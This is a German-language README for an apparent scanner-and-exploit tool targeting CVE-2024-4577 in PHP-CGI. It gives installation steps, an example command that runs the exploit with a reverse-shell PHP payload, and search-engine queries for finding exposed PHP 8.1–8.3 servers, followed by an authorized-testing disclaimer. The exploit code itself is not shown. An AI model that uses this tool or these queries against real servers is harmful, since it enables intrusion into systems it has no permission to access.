

CVE-2024-4577 ist eine kritische Schwachstelle, die PHP-Anwendungen betrifft, die die Common Gateway Interface (CGI) verwenden. Dieses Tool dient sowohl als Scanner als auch als Exploit und ermöglicht Cybersicherheitsexperten Folgendes:
# Clone the repository
git clone https://github.com/your-username/CVE-2024-4577-scanner.git
# Navigate to the project directory
cd CVE-2024-4577-scanner
# Install required dependencies
pip install -r requirements.txt
Stellen Sie sicher, dass Python 3 auf Ihrem System installiert ist. Verwenden Sie die folgende Befehlsstruktur:
python3 CVE-2024-4577.py [-h] -t TARGET_FILE [-s] [-e] [-p PAYLOAD_FILE]
-h, --help: Hilfemeldung anzeigen und beenden-t TARGET_FILE, --target-file TARGET_FILE: Datei mit Ziel-URLs (erforderlich)-s, --scan: Nur einen Schwachstellenscan durchführen-e, --exploit: Versuchen, die Schwachstelle auszunutzen-p PAYLOAD_FILE, --payload-file PAYLOAD_FILE: PHP-Payload-Datei für die Ausnutzungpython3 CVE-2024-4577.py -t targetsite.txt -e -p rev_shell.php
Nutzen Sie leistungsstarke Suchmaschinen, um potenziell verwundbare Hosts zu identifizieren:
Suchen Sie nach Servern, auf denen die PHP-Versionen 8.1, 8.2 und 8.3 ausgeführt werden:
server: PHP 8.1, server: PHP 8.2, server: PHP 8.3, html:"phpinfo"
protocol="http" && (header="X-Powered-By: PHP/8.1" || header="X-Powered-By: PHP/8.2" || header="X-Powered-By: PHP/8.3")
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Forschungszwecke bestimmt. Stellen Sie sicher, dass Sie eine ausdrückliche Genehmigung haben, bevor Sie Systeme scannen oder versuchen, Systeme auszunutzen, die Sie nicht besitzen oder für die Sie kein Testrecht haben.
Wenn Sie auf Probleme stoßen oder Fragen haben, reichen Sie bitte ein Issue im GitHub-Issue-Tracker ein.